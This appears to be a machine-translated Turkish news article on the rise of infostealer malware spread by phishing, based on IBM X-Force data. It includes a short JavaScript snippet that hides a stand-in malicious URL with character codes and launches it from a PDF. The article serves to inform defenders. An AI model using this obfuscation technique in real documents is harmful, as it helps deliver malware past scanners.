Infostealers aracılığıyla saldırı haftada kimlik avı e -postaları yoluyla% 84 arttı


Infostealers aracılığıyla saldırı haftada kimlik avı e -postaları yoluyla% 84 arttı

Siber güvenlik araştırmacıları, kimlik avı kanalları aracılığıyla Infostealer kötü amaçlı yazılım dağılımında endişe verici bir artışı belgeledi ve haftalık teslimat hacmi 2024’te bir önceki yıla göre% 84 arttı.

Yakın zamanda yayınlanan verilere göre, bu yükseliş eğilimi yavaşlama belirtisi göstermiyor, 2025’in başlarında rakamlar haftalık hacimde 2023 taban çizgisine kıyasla daha da dramatik bir artış olduğunu gösteriyor.

Bu üstel büyüme, tehdit aktörleri geleneksel arka kapı kötü amaçlı yazılımları dağıtmak yerine giderek daha fazla kullanıcı kimlik bilgilerini hedeflerken saldırı metodolojilerinde temel bir değişime işaret ediyor.

Google Haberleri

Infostealers, tehlikeye atılan sistemlerden değerli bilgileri çıkarmak için tasarlanmış özellikle sinsi bir kötü amaçlı yazılım sınıfını temsil eder.

Bu programlar arka planda sessizce çalışır, ekran görüntüleri yakalar, tuş vuruşları ve en eleştirel olarak, tarayıcılardan, kripto para cüzdanlarından ve şifre yöneticilerinden saklanan kimlik bilgilerini toplar.

Defiltrat edildikten sonra, bu kimlik bilgileri sonraki saldırılara neden olan geçerli hesap uzlaşması, artık güvenlik olaylarının% 30’unda en iyi erişim vektörü olarak kamuya açık uygulamaların kullanımı ile bağlantılıdır.

Doğum mekanizmalarının evrimi, bu tehditlerin çoğalmasında önemli bir rol oynamıştır. ZIP arşivleri ve Microsoft Office belgeleri gibi geleneksel kötü niyetli ekler önemli ölçüde azalmış, kötü amaçlı zip ve RAR ekleri sırasıyla% 70 ve% 45 oranında düşmüştür.

Bunun yerine, saldırganlar kötü niyetli URL’leri görünüşte zararsız PDF belgeleri içine yerleştirmeye ve kötü amaçlı yazılımlarını barındırmak için güvenilir bulut platformlarından yararlanarak birçok geleneksel güvenlik kontrolünü etkili bir şekilde atlatmaya yöneldiler.

IBM analistleri AgentTesla’yı kimlik avı e -postaları yoluyla dağıtılan en yaygın Infostealer olarak tanımladı, ardından Formbook, Snakeylogger ve Purelogs Stealer.

Karanlık Web Forumlarında görülen ilk beş infosterer (Kaynak – IBM)

Bu arada, karanlık web pazarı analizi, Infostealer listelerinde yıllık% 12’lik bir artış olduğunu ve Lumma’nın yeraltı ekonomisine hakim olduğu, ardından Risepro, Vidar, Stealc ve Redline’ı ortaya koydu.

Bu gelişen suç ekosistemi, kimlik bilgisi hasat operasyonlarının kârlılığını ve sürdürülebilirliğini göstermektedir.

IBM X-Force başkanı Charles Henderson, “2024’te yanıt verdiğimiz tüm güvenlik olaylarının% 28’inde kimlik bilgisi hasadı gözlendi” dedi.

“Çoğu zaman, bu çalınan kimlik bilgileri, saldırganların ortamlarda yanal olarak hareket ettikleri için uzun süreler boyunca tespit edilmemelerine izin vererek tespit ve iyileştirmeyi son derece zor hale getirir.”

PDF gizleme teknikleri: gizli tehlike

PDF tabanlı dağıtım mekanizmalarına doğru kayma, Infostealer manzarasındaki en sofistike evrimlerden birini temsil eder.

Tehdit aktörleri PDF dosyalarını benimsemiştir, çünkü kötü niyetli kodu etkili bir şekilde gizleyebilen karmaşık yapılara sahip evrensel olarak güvenilir belge formatlarıdır.

Kötü niyetli PDF’lerin analizi,% 42’si kullanılan gizlenmiş URL’lerin,% 28’inin URL’lerini PDF akışlarında gizlediğini ve% 7’sinin eşlik eden bir şifre ile şifreli formda verildiğini ortaya koymaktadır.

Bu gizleme tekniklerinin teknik sofistike olması, genellikle onaltılık temsil veya JavaScript gizleme gibi yöntemler kullanarak kötü amaçlı URL’lerin kodlanmasını içerir.

Örneğin, tipik bir gizlenmiş URL şu şekilde kodlanabilir:-

var url = String.fromCharCode(104,116,116,112,115,58,47,47,109,97,108,119,97,114,101,46,115,105,116,101);
app.launchURL(url);

Bu kod, yürütüldüğünde ancak otomatik tarama sistemlerine zararsız göründüğünde basit bir “https://malware.site” anlamına gelir.

Dahası, tehdit aktörleri sıklıkla içeriğin sıkıştırıldığı ve kodlandığı şifreli PDF akışlarından yararlanır ve bu da tespiti geleneksel güvenlik araçları için daha zor hale getirir.

Bu PDF tabanlı saldırılar, Grandoreiro, Mekotio ve Guildma gibi bankacılık truva atlarının buluta barındırılan altyapı aracılığıyla dağıtılmasıyla Latin Amerika finans kurumlarını özellikle hedef aldı.

Sofistike gizleme teknikleri, güvenilir dosya formatları ve meşru barındırma platformlarının birleşimi, kimlik bilgisi hırsızlığı operasyonları için mükemmel bir fırtına oluşturur ve kuruluşların gelişmiş uç nokta koruması ve kimlik yönetimi kontrollerini içerecek şekilde geleneksel e -posta tarama çözümlerinin ötesine uzanan katman savunmaları uygulamasını gerektirir.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy



Source link